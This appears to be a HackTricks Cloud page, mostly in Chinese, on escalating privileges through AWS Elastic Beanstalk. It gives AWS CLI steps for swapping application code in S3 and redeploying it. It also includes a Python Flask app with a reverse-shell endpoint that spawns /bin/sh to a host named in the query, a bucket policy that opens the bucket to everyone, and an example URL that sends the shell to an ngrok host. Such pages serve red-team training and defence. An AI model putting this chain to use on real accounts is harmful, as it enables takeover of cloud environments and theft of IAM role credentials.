HackTricks CloudAWS - Elastic Beanstalk Privesc
Tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
Elastic Beanstalk
更多关于 Elastic Beanstalk 的信息见:
Warning
为了在 Beanstalk 中执行敏感操作,你需要在许多不同的服务中拥有大量敏感权限。例如,你可以检查授予
arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk的权限。
elasticbeanstalk:RebuildEnvironment, S3 写权限 & 其他许多权限
如果拥有对包含环境code的 S3 存储桶的写权限,以及重建应用所需的权限(需要 elasticbeanstalk:RebuildEnvironment 和一些与 S3、EC2 和 Cloudformation 相关的权限),你可以修改该code、重建该 app,下一次访问该 app 时它将执行你新的 code,从而允许攻击者接管该应用以及其 IAM role credentials。
# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"
elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, 以及更多…
上述权限加上若干 S3, EC2, cloudformation ,autoscaling 和 elasticloadbalancing 权限是从零创建一个原始 Elastic Beanstalk 场景所必需的。
- 创建一个 AWS Elastic Beanstalk 应用:
aws elasticbeanstalk create-application --application-name MyApp
- 创建一个 AWS Elastic Beanstalk 环境 (supported platforms):
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
如果环境已经创建且你不想创建新的,你可以更新已有的环境。
- 将你的应用程序代码和依赖打包成一个 ZIP 文件:
zip -r MyApp.zip .
- 将 ZIP 文件上传到 S3 bucket:
aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
- 创建一个 AWS Elastic Beanstalk 应用版本:
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
- 将应用程序版本部署到你的 AWS Elastic Beanstalk 环境:
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
首先,您需要按照previous steps,在victim上创建一个legit Beanstalk environment,并部署您想运行的code。可以准备一个包含以下2 files的简单zip:
from flask import Flask, request, jsonify
import subprocess,os, socket
application = Flask(__name__)
@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')
@application.route("/")
def index():
return jsonify('Welcome!')
@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')
if __name__=="__main__":
application.run()
一旦你在 your own Beanstalk env running 上运行了你的 rev shell,就该将它 migrate 到 victims env。为此,你需要 update the Bucket Policy 在你的 beanstalk S3 bucket 上,使 victim can access it(注意,这将 open 该 Bucket 给 EVERYONE):
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"
# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
Tip
学习和实践 AWS 黑客技术:
学习和实践 GCP 黑客技术:支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。